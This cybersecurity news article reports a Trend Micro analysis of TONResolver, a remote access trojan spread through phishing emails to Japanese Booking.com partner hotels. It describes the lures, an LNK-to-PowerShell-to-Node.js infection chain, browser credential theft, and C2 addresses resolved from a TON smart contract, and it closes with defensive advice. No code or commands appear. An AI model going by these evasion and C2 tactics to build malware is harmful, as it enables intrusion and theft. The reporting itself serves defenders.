A new wave of cyberattacks targeting Japan’s hospitality sector has put the global threat landscape on high alert.
In late May 2026, attackers began sending phishing emails to Japanese partner companies of Booking.com, disguised as urgent guest complaints and review requests.
The goal was to trick hotel staff into opening malicious files that handed remote control of their systems to an attacker.
What makes this campaign alarming is how the malware operates. Instead of hardcoding a command-and-control server, the attackers used The Open Network (TON) blockchain as a “dead drop resolver,” a technique that lets them update the server address at any time without touching the malware itself.
This makes the threat far harder to detect or shut down once inside a network. Analysts at Trend Micro identified the malware, naming it TONResolver, and confirmed it functions as a Remote Access Trojan (RAT).
Trend Micro said in a report shared with Cyber Security News (CSN) that infected endpoints remain in a persistent keepalive loop, staying connected and ready to receive attacker commands for as long as the infection is active. Telemetry confirmed Japan as the most heavily impacted region.
Two delivery methods were observed. The first was bulk phishing with subject lines such as “Important: Guest Stay Review Request.”
The second was a “conversational attack” through Gmail, where the attacker sent an innocent inquiry, waited for a reply, then followed up with a malicious link. Building trust before delivering the payload is a tactic commonly linked to advanced persistent threat groups.
The impact of a successful infection extends beyond the initial entry point. Once TONResolver runs, it collects the victim’s username, hostname, operating system, CPU count, memory, and MAC address.
Follow-on activity confirmed through managed detection and response analysis revealed credential theft attempts, with the malware targeting browser-stored passwords, cookies, history, and autofill data from Chrome and Edge.
TONResolver Malware Uses TON Smart Contracts
The defining technical feature of TONResolver is how it locates its command-and-control server. Rather than embedding a fixed address, the attackers stored the C2 domain inside a TON smart contract.
When the malware runs, it contacts tonapi[.]io via a method called “get_domain” to retrieve the current live server address.
This gives attackers a critical advantage. If a C2 server is blocked or taken offline, they update the domain inside the TON contract and all infected machines automatically reconnect to the new server with no change to the malware itself.
Transaction history analysis confirmed multiple C2 domain switches, showing this mechanism was actively exploited throughout the campaign.
The payload is a JavaScript file executed through Node.js, a legitimate and widely trusted platform. VM-based obfuscation converts the logic into a custom virtual instruction set that defeats static analysis.
All traffic is encrypted using WebSocket with ECDH key exchange and AES-256-CBC, making packet-level inspection largely ineffective against this threat.
Infection Chain and Persistence Tactics
The attack begins when a victim clicks a hyperlink in the phishing email, downloading a zip archive from a malicious website.
Inside is a shortcut file (.LNK) disguised as a photo, and clicking it triggers a PowerShell command that fetches a PS1 script from the attacker’s server and launches the full infection chain.
The PS1 script deploys the JavaScript payload and silently downloads Node.js from nodejs.org to serve as the execution environment.
The malware sets a Windows registry Run key for persistence and uses a mutex check to prevent duplicate instances. This blend of malicious and legitimate behavior helps it evade many standard security tools.
Organizations should act without delay. Trend Micro recommends restricting connectivity to the TON platform, as blocking tonapi[.]io can cut the dead drop resolver link entirely.
Configuring PowerShell to block external file retrieval and monitoring for Node.js running from AppData paths are also strongly advised.
Reviewing configurations, strengthening endpoint monitoring, and refreshing incident response procedures are essential steps for organizations that could be targeted in this ongoing campaign.
Indicators of Compromise (IoCs):-
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
